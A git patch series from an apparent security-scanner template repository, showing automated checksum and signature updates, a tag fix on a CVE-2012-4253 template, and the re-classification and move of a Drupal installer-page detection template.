http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c +http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:c39f1ef0b33169857d5d46a8397b6894d92ff8a4 +templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 516ef9acd478f987368a317691e0a18d4dd3b1c4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 20 Mar 2024 19:21:17 +0000 Subject: [PATCH 44/53] Auto Template Signing [Wed Mar 20 19:21:17 UTC 2024] :robot: --- http/technologies/microsoft/microsoft-iis-version.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/technologies/microsoft/microsoft-iis-version.yaml b/http/technologies/microsoft/microsoft-iis-version.yaml index ac03e25967..d85e1c2ad9 100644 --- a/http/technologies/microsoft/microsoft-iis-version.yaml +++ b/http/technologies/microsoft/microsoft-iis-version.yaml @@ -29,5 +29,4 @@ http: part: header kval: - Server - -# digest: 490a0046304402204aec8d1c4678a40a8ca831d952b351c4ca885fb845222a559099426e6a27ba9602204f9487670472a494fcecc37f1ebc08e68f6c3007de6fae438c5f5b7210e66a87:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207a63b4fb5117f7f1168ba477b97deaa35e7e38c9355639a7df7c8f6f54fa960c022100e3d3f3c25ecff01f75a723ca2df3e64e5ea725d7cc61f70ef54e41f6899fc359:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 02c060a8e43fdcd8dfd34b0cf7369559fe3b900b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=88=91=E4=BC=9A=E5=95=8AD=2C=E6=98=8E=E5=B0=8F=E5=AD=90?= =?UTF-8?q?=2C=E5=BE=A1=E5=89=91?= <104293903+pwnhxl@users.noreply.github.com> Date: Thu, 21 Mar 2024 08:29:27 +0800 Subject: [PATCH 45/53] fix tag CVE-2012-4253.yaml --- http/cves/2012/CVE-2012-4253.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index cc95c455b2..046f3fb2ab 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mysqldumper product: mysqldumper - tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper,xss + tags: cve2012,cve,packetstorm,lfi,edb,mysqldumper http: - method: GET @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 From a2b5863af447952626bd9d9282ec1c6780fc4724 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:00:49 +0000 Subject: [PATCH 47/53] Auto Generated Templates Checksum [Thu Mar 21 05:00:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b1f3af28bf..07d57b29ee 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:8191f7e69d1dbec2c0b9ea2f687eafa87eeb2214 +http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -6537,7 +6537,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0 http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06 http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81 -http/technologies/microsoft/microsoft-iis-version.yaml:388eeed4e41d6681d1715a232292e33ee19e1ae3 +http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06 http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7 http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69 http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:30add9985a0dfd3be88361eb34dcd71c7d70f2c6 +templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From cf8cd4f27a74fa4712a830672ea5b888b88b17c1 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 05:02:28 +0000 Subject: [PATCH 48/53] Auto Template Signing [Thu Mar 21 05:02:28 UTC 2024] :robot: --- http/cves/2012/CVE-2012-4253.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index 046f3fb2ab..fbe3a390e6 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eefa80b385734b0a1e6f33288900b62b779941de6560c529987c9593f998d354022100a78e22cf092547bdbd7693f37f2f5fe8f9d4858b98c6fcfc32c3cf37b6f96274:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100de6cb5ae696eb8f0b8837ff02b5e53e8049e806e0253c9933027f7da28634071022100fc1518b608713661374a7f1ebd5ef01b8816925196928a73aa3882adf5bf8192:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b1b540179aa297e2f3c9767d174d126eed204917 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 21 Mar 2024 13:08:19 +0530 Subject: [PATCH 49/53] Update drupal-install.yaml --- http/exposures/files/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/exposures/files/drupal-install.yaml b/http/exposures/files/drupal-install.yaml index 6bc4fa3159..bc154f9f53 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/exposures/files/drupal-install.yaml @@ -3,7 +3,7 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: low + severity: critical description: Drupal Install panel exposed. metadata: max-request: 2 @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 From 0cd4e5a335c7675189e58fd588aca060a6316af0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 21 Mar 2024 13:11:35 +0530 Subject: [PATCH 50/53] Update and rename drupal-install.yaml to drupal-install.yaml --- .../files => misconfiguration/installer}/drupal-install.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename http/{exposures/files => misconfiguration/installer}/drupal-install.yaml (91%) diff --git a/http/exposures/files/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml similarity index 91% rename from http/exposures/files/drupal-install.yaml rename to http/misconfiguration/installer/drupal-install.yaml index bc154f9f53..282cedeb23 100644 --- a/http/exposures/files/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -3,12 +3,12 @@ id: drupal-install info: name: Drupal Install author: NkxxkN - severity: critical + severity: high description: Drupal Install panel exposed. metadata: max-request: 2 shodan-query: http.component:"drupal" - tags: exposure,drupal + tags: misconfig,drupal,install,exposure http: - method: GET From 0638540f77d37de7b8b418b6e3247f18594fe62c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:45:49 +0000 Subject: [PATCH 52/53] Auto Generated Templates Checksum [Thu Mar 21 07:45:49 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 07d57b29ee..1eb6877577 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -976,7 +976,7 @@ http/cves/2012/CVE-2012-2371.yaml:c9b170834b0f6878fbd65a84289f9dde6cdf6edf http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f http/cves/2012/CVE-2012-4032.yaml:c433e79a48badc5d9996e22bcd1939ee98401e92 http/cves/2012/CVE-2012-4242.yaml:d4acd90297d0e2c72a092b7a02a3cd8d9b532923 -http/cves/2012/CVE-2012-4253.yaml:93bd7e8a7190482cf491b58ff39abf24dc655387 +http/cves/2012/CVE-2012-4253.yaml:22bb780ede0f6ee252aa15a98a2b1c8d437494e4 http/cves/2012/CVE-2012-4273.yaml:d7e6647482c7d87038483b2bc94a26745bb3c841 http/cves/2012/CVE-2012-4547.yaml:d254026e048515763754a600a75aab80318b79f5 http/cves/2012/CVE-2012-4768.yaml:61df87600a157bab6ca0ae1244cf87d5dbb36af7 @@ -4528,7 +4528,6 @@ http/exposures/files/desktop-ini-exposure.yaml:e1f2848de5e29a1d1f0069c15a5451d38 http/exposures/files/django-secret-key.yaml:9a9152c6627c7d1bb85923caedf61303f26e78b9 http/exposures/files/docker-cloud.yaml:1cd831e6d009b49e120b14206b7a19b825fd5272 http/exposures/files/domcfg-page.yaml:28b2f74eed60f6bf047db658ffcf8ccbacfb90a4 -http/exposures/files/drupal-install.yaml:becf211637e4dbbe6b1f0fa018d53f4ea23de648 http/exposures/files/ds-store-file.yaml:679fb351af4567e417c0697f8d3298ddc14767b4 http/exposures/files/dwsync-exposure.yaml:811dc04f9ef973b6d48e8b007590508b61230b4b http/exposures/files/environment-rb.yaml:cfd936dc5174ec7eee345830477ad8ee013d5eb4 @@ -5134,6 +5133,7 @@ http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3 http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7 http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8c7780da1efd6057 +http/misconfiguration/installer/drupal-install.yaml:8935c0e57b3677226b50338b8495600390d3e8b0 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 @@ -8176,7 +8176,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:05e0c517f0d08f9334bb67bf6c18a1ccafde36eb +templates-checksum.txt:128d6f230562518d7dd61144f475986ae8d2e63c wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 9b16d8e79707b4f706c7c4369912e55cd7615fc7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 21 Mar 2024 07:47:25 +0000 Subject: [PATCH 53/53] Auto Template Signing [Thu Mar 21 07:47:25 UTC 2024] :robot: --- http/misconfiguration/installer/drupal-install.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/misconfiguration/installer/drupal-install.yaml b/http/misconfiguration/installer/drupal-install.yaml index 282cedeb23..734fee7e5b 100644 --- a/http/misconfiguration/installer/drupal-install.yaml +++ b/http/misconfiguration/installer/drupal-install.yaml @@ -23,4 +23,4 @@ http: - type: word words: - "Choose language | Drupal" -# digest: 490a0046304402206f6f65e8aa3223ec1f67b0e97780b4bc7d9ddc28af4ba9562d4d52ae06946a82022037c67f1e4b8c5b8bac6369fb8a23830b76a97f8188317b70b7275c284b201b8c:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220115cf9e237a9e0e09034a814da536ec254ae826df2023819714ad7677814606102207ecda93edc69d914ee07bed7be0c76fcae80cd410e6a511552cd3686c8e6e785:922c64590222798bb761d5b6d8e72950 \ No newline at end of file